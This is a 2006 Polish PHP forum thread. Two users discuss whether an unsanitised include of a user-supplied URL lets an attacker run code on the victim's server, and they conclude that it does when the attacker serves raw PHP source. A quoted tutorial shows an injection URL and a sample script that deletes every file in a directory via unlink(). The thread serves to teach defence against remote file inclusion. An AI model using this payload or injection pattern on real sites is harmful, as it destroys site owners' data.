Zagrożenie przy Includowanie pliku z innegoServera

Zagrożenie przy Includowanie pliku z innegoServera

maverickkk Zobacz profil	17.04.2006, 09:47:28 Post #1
Grupa: Zarejestrowani Postów: 181 Pomógł: 0 Dołączył: 12.11.2005 Ostrzeżenie: (0%)	Hi. W manualu php jest napisane o include: "(..)Ściśle mówiąc, nie jest to to samo, co wczytywanie pliku lokalnego; jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego. W tym przypadku, rzecz jasna, zasięg globalny zmiennych nie obejmuje pliku wczytywanego tą metodą." Czyli defakto nie jest możliwy atak na niezabezpieczony include podająć adres URL do pliku .php na innym serverze przykładowo gdzie include($tytul) : http://xxxxx.pl/?tytul=http://123.123.123.123/index.php Pozdro. -------------------- Robie to co lubie, lubie to co Robie

LBO Zobacz profil	17.04.2006, 09:52:45 Post #2
Grupa: Zarejestrowani Postów: 1 415 Pomógł: 117 Dołączył: 7.09.2005 Skąd: Warszawa Ostrzeżenie: (0%)	polecam dogłębną lekturę tego tematu - jest tam między innymi odpowieź na nurtujące Ciebie pyt. cheers Ten post edytował LBO 17.04.2006, 09:58:57

maverickkk Zobacz profil	17.04.2006, 10:20:55 Post #3
Grupa: Zarejestrowani Postów: 181 Pomógł: 0 Dołączył: 12.11.2005 Ostrzeżenie: (0%)	LBO -> Przeglądałem podany temat ale teraz zrobie to dogłebnie jeśli mam znaleść tam rozwiązanie... Ale już pierwsze słowa się nie zgadzają z manualem bo jest pisane w poście Cytat "(..)Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres: http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.php Dajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak: <?php $katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany / while ($plik = readdir($katalog)) { unlink($file); } ?> No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.(..) " A manual mówi " Cytat (..) jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego(..)" Czyli jedyne co hacker może skasować takim skryptem to katalogi na własnym serverze ? Czyli dalsze sposoby są bezurzyteczne na zablokowanie includowania przez URL. Bo taki gość sobie zainkluduje plik, strona zmienic wygląd ale w żaden sposób nie zmienic zawartośći plików na naszym serverze ? Ten post edytował maverickkk* 17.04.2006, 10:22:18 -------------------- Robie to co lubie, lubie to co Robie

LBO Zobacz profil	17.04.2006, 10:27:13 Post #4
Grupa: Zarejestrowani Postów: 1 415 Pomógł: 117 Dołączył: 7.09.2005 Skąd: Warszawa Ostrzeżenie: (0%)	a co jeżeli haker wyłączy obsługę php na swoim serwerze i include'owany plik będzie zawierał czysty php w postaci: [PHP] pobierz, plaintext <?php //unfriendly script ?> [PHP] pobierz, plaintext

maverickkk Zobacz profil	17.04.2006, 10:31:04 Post #5
Grupa: Zarejestrowani Postów: 181 Pomógł: 0 Dołączył: 12.11.2005 Ostrzeżenie: (0%)	I to jest dobre pytanie. Sprawdziłem jeśli plik jest zakończony inaczej niż .php to jego zawartość jest wykonana na serverze ofiary. Groźnie Czyli wszystkie rozwiązania w temacie który podałeś są słuszne LBO -> thx za pomoc. Ten post edytował maverickkk 17.04.2006, 11:14:51 -------------------- Robie to co lubie, lubie to co Robie

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Aktualny czas: 18.07.2025 - 01:00

Hosting zapewnia

Forum PHP.pl